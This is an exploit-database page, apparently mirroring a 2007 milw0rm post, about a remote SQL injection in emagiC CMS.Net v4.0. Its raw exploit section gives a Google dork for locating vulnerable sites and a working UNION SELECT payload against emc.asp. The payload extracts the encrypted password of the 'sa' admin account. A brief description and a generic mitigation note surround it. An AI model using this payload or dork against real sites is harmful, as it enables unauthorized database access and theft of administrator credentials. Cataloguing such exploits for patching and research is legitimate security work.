header-logo
Suggest Exploit
vendor:
emagiC CMS.Net
by:
hak3r-b0y
N/A
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: emagiC CMS.Net
Affected Version From: 4.0
Affected Version To: 4.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

emagiC CMS.Net v4.0 Remote SQL Injection Exploit

The exploit allows an attacker to perform a remote SQL injection in emagiC CMS.Net v4.0. By injecting a malicious SQL query, the attacker can retrieve the encrypted password for the admin 'sa'.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of emagiC CMS.Net. Additionally, input validation and parameterized queries should be implemented to prevent SQL injection attacks.
Source

Exploit-DB raw data:

--------------------

emagiC CMS.Net v4.0 Remote SQL Injection Exploit

--------------------

+ Found  : hak3r-b0y
+ Gr33tz : darko , V4 CrackerS , hacker_alQassam , Ans , Barra, all ans-hacker.com members
+ Script URL : http://www.emagic-cms.com/
+ D0rk : inurl:emc.asp?pageid=
--------------------

Exploit:

emc.asp?pageId=1' UNION SELECT TOP 1 convert(int, password%2b'%20x') FROM EMAGIC_LOGINS where username='sa'--

y0u will find the crypted password

for the admin 'sa'
--------------------

ContacT: mohamed_amine_1991@hotmail.com

--------------------

# milw0rm.com [2007-10-28]

Navigation

Suggest Exploit

Services By CQR